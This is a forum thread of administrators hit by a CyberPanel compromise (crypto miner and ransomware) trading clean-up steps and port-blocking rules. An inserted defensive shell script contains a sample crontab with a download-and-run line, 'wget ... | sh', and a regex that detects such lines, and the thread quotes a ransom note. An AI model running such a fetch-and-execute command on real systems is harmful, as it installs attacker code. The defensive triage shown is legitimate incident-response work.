I think my provider solved the SSH issue because I can access it normally now.
I’m with Verpex.
In my case the binary was called bash3, and I found it too late after it had already encrypted nearly the whole server.
The other files were not present.
I killed it and will investigate tomorrow through a rescue console, without starting the server.
Are your websites all working now?
I still can't log in via SSH. I am on Hetzner Cloud.
With your help I managed to delete the file /usr/lib/secure/udiskssd.
However, I can’t get hold of the file /var/spool/cron/root to repair crontab. Any help please?
My websites always worked. It was “just” the email accounts, CyberPanel and SSH that didn’t work. Now SSH is working and I have removed 1 file that was malicious. Scanned the entire thing and nothing new found. The mail accounts and CyberPanel still don’t work…
Run
chattr -ia /var/spool/cron/root
I’ve created this for kinsing clean-up. Haven’t tested it, need access to an infected machine to test it out completely.
Create a shell script and run it on your cron job every minute.
This will reduce the load on your CPU. After that, just restart the services that are down. If your SSH doesn’t open, try changing the SSH port through the panel. It will start working again.
This is a temporary solution… it is recommended that you restore the backup on a server with a clean installation… see the shell script below.
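The two posts above boil down to the same clean-up loop: the miner pins its files and the root crontab with `chattr +i`/`+a`, so `rm` and crontab edits fail until the flags are cleared, and the crontab then needs to be checked for the download-and-run line that re-infects the host. The script below is an added example written for this thread, not the poster's script (which is not on the page) and not CyberPanel or Kinsing code. It assumes GNU `lsattr`/`chattr` (e2fsprogs), takes the paths named in the thread (`/var/spool/cron/root`, `/usr/lib/secure/udiskssd`) as its defaults, and uses a constructed sample crontab; the `curl|wget ... | sh` regex is an assumption about the shape of the re-infection job, not a signature taken from the page.

```shell
#!/bin/sh
# Added example for the CyberPanel/Kinsing clean-up thread. Not the poster's
# script; paths come from the thread, the cron regex is an assumption.

# has_lock_attr LSATTR_LINE
# Given one line of `lsattr` output ("----i---------e------- /path"), return 0
# when the flag field contains 'i' (immutable) or 'a' (append-only), the two
# flags that make rm/crontab fail even as root; return 1 otherwise.
has_lock_attr() {
    flags=${1%% *}           # first field is the attribute string
    case "$flags" in
        *i*|*a*) return 0 ;;
        *)       return 1 ;;
    esac
}

# unlock_path PATH
# Clear i/a on PATH if they are set. Needs root and an lsattr-capable fs;
# prints what it did so the admin can see which files were pinned.
unlock_path() {
    p=$1
    [ -e "$p" ] || { echo "absent: $p"; return 0; }
    command -v lsattr >/dev/null 2>&1 || { echo "lsattr not available"; return 1; }
    line=$(lsattr -d -- "$p" 2>/dev/null) || { echo "lsattr failed: $p"; return 1; }
    if has_lock_attr "$line"; then
        if [ "$(id -u)" -eq 0 ]; then
            chattr -ia -- "$p" && echo "unlocked: $p"
        else
            echo "locked (need root to chattr -ia): $p"
        fi
    else
        echo "not locked: $p"
    fi
}

# suspicious_cron_lines < CRONTAB
# Print non-comment cron lines that fetch something with curl/wget and pipe
# it into sh/bash: the usual persistence shape for this kind of miner.
# The pattern is an assumption for this example, not a published IOC.
suspicious_cron_lines() {
    grep -v '^[[:space:]]*#' \
    | grep -E '(curl|wget)[^|]*\|[[:space:]]*(/bin/|/usr/bin/)?(ba)?sh([[:space:]]|$)'
}

# Constructed sample crontab (not captured from any real host).
SAMPLE_CRON='# constructed sample for this example
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * wget -q -O - http://198.51.100.7/x.sh | sh > /dev/null 2>&1
30 2 * * * /usr/local/bin/backup.sh'

# Paths named in the thread; any arguments override them.
DEFAULT_PATHS='/var/spool/cron/root /usr/lib/secure/udiskssd'

# Only act when invoked with explicit paths, so sourcing the file is harmless.
for p in "$@"; do
    unlock_path "$p"
done

if [ "$#" -gt 0 ]; then
    echo "--- suspicious entries in /var/spool/cron/root ---"
    [ -r /var/spool/cron/root ] && suspicious_cron_lines < /var/spool/cron/root
    echo "--- default paths you may also want to pass: $DEFAULT_PATHS ---"
fi
```

Run it as root with the paths you want checked, e.g. `sh cleanup.sh /var/spool/cron/root /usr/lib/secure/udiskssd`; once the crontab is unlocked, delete the flagged line and then `chattr +i` nothing yourself: the point of clearing the flags is to let you edit, and a re-appearing flag after cleanup means the dropper is still running from somewhere else. Treat all of this as triage on a host you intend to rebuild, as the post above already advises.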
All my files have been encrypted. My database too.
There are some README files asking for money
What can I do?
This is insane. It started on both my servers yesterday, around exactly this time. Decided to reinstall everything and restore my websites, change all passwords etc. Well, crazy…
For me, my server is not even turning on anymore, it’s not even rebooting lol… It’s like it froze.
@gringofrijolero I believe your problem is something else… since the problem everyone is having is with miners, no case of encrypted data…
Is it possible to prevent the infection from reaching non-infected servers? For example by stopping the lscpd service?
@plumcake apparently it only affected those who use version v2.3.6.
I know some people with servers on older versions and they haven’t had any problems, but I can’t tell you if they’re safe.
I also can’t tell you if we should update to the latest version released today, since there’s no information about the problem in the update information.
I don’t think so.
lscpd was used to gain access and once they get access, they may not necessarily need lscpd (depending on the exploit) but it’s a good measure.
I blocked all access to 7080, 8090 and then started cleaning up
My little idea after reinstalling from yesterday’s backup and doing the upgrade was to block access to port 8090 and port 7080 with csf.
I added to csf.allow:
tcp|in|d=8090|s=1.2.3.4
tcp|in|d=7080|s=1.2.3.4
(1.2.3.4 means your own IP)
and removed ports 8090 and 7080 from csf.conf.
It’s not 100% but maybe a little help.
I had 7 infected servers. And one is infected by that encryption trojan with .locked files.
Very stupid people who kill the system by locking system files…
We have several servers hit with the mining malware and were able to clean, but we also had 2 sites with all the files encrypted and extension was .locked.
All occurred last night.
Was able to resolve with backups from previous night.
I think it’s related somehow, if not directly maybe another took advantage of the compromised machines.
Hello community.
First of all I want to make it clear that I am a noob. I have been affected by this and my news website is down. I have a backup from 10/22. According to Hostinger I need to restore it and update Cyber Panel. What I want to know is if there is a possibility to repair everything without losing everything published after 10/22 or if it is no longer possible and all this will be lost. Thank you very much in advance.
Same for me!
Found that “nice” message on my server:
prepare 1 btc .contact email:[email protected],if you can’t contact my email, please contact some data recovery company(suggest taobao.com), may they can contact to me .your id: